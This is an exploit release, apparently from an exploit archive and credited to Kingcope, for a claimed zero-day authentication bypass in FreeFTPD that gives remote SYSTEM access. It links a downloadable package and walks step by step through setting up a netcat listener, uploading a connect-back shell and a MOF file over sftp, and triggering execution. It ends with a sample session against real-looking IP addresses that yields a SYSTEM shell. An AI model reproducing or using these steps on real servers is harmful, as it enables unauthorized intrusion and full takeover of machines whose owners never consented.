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FreeFTPD all versions Remote System Level Exploit Zero-Day -- No username needed, straightforward rooting!
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Discovered & Exploited By Kingcope
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Year 2011
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https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/23079.zip
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Example banner: WeOnlyDo-wodFTPD 2.3.6.165
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This package includes all you need to successfully root any version of FreeFTPD:
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* Modified version of ssh.exe (FreeFTPD authentication bypass)
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* sftp.exe for connecting to the server
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* nullevent.exe connect back shell that is uploaded to the server
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* nullevent.mof file which is uploaded to the server to execute the connect back shell
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* MSVCR100.dll that is needed by nullevent.exe
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* scan logs for your pleasure!
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We make use of the STUXNET technique to execute code, So let's go:
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1.) Setup a netcat on a host you have, firewall open on the listening port
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2.) modify nullevent.mof in an editor (where the ip and port is) according to your netcat config
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3.) connect to the FreeSSHD: sftp.exe -S ./ssh.exe <ip/host>
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4.) upload (put) nullevent.exe: put nullevent.exe
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5.) upload (put) MSVCR100.dll: put MSVCR100.dll
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6.) upload (put) nullevent.mof to wbem/mof/nullevent.mof: put nullevent.mof wbem/mof/nullevent.mof
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7.) Enjoy your system shell which will blink up on you netcat after 1 minute!!
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8.) Cleanup by deleting nullevent.exe located in c:\windows\system32\
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8.) Enjoy!
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9.) Enjoy!
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10.) Enjoy!
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Example exploitation session:
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C:\Users\KC\Desktop\FreeFTPD_0day>sftp -S ./ssh.exe 83.241.214.171
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Could not create directory '/home/KC/.ssh'.
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The authenticity of host '83.241.214.171 (83.241.214.171)' can't be established.
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RSA key fingerprint is a8:ba:6d:0a:c6:ae:8b:a1:b6:47:7b:43:a8:de:4b:8e.
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Are you sure you want to continue connecting (yes/no)? yes
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Failed to add the host to the list of known hosts (/home/KC/.ssh/known_hosts).
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Connected to 83.241.214.171.
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sftp> put nullevent.exe
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Uploading nullevent.exe to /nullevent.exe
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nullevent.exe 100% 7168 7.0KB/s 00:00
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sftp> put MSVCR100.dll
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Uploading MSVCR100.dll to /MSVCR100.dll
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MSVCR100.dll 100% 751KB 22.8KB/s 00:33
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sftp> put nullevent.mof wbem/mof/nullevent.mof
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Uploading nullevent.mof to /wbem/mof/nullevent.mof
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nullevent.mof 100% 691 0.7KB/s 00:00
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sftp>
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[root@vs2067037 ~]# nc -v -l 443
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Connection from 83.231.224.193 port 443 [tcp/https] accepted
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Microsoft Windows [Version 5.2.3790]
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(C) Copyright 1985-2003 Microsoft Corp.
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C:\WINDOWS\system32>whoami
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whoami
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nt authority\system |